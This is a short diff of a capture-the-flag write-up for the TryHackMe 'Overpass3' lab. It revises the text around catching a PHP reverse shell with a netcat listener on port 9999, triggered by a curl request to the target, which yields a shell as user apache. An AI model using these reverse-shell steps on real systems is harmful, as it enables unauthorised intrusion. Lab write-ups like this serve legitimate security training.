ajread4/thm_writeups_publish/Overpass3.md

 226 Transfer complete.
 5492 bytes sent in 0.00 secs (62.3521 MB/s)
 ```
-I opened up a netcat listener on port 9999 and caught the shell.
+I opened up a netcat listener on port 9999.
 ```
 nc -lnvp 9999
 ```
-Then, I ran a curl command to call the php shell.
+Then, I ran a curl command to call the php reverse shell which I caught with the netcat listener above.
 ```
 curl http://[Remote IP]/php-reverse-shell.php
 ```
-Now, I have a shell!
+Now, I have a shell as user apache!
 ```
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache)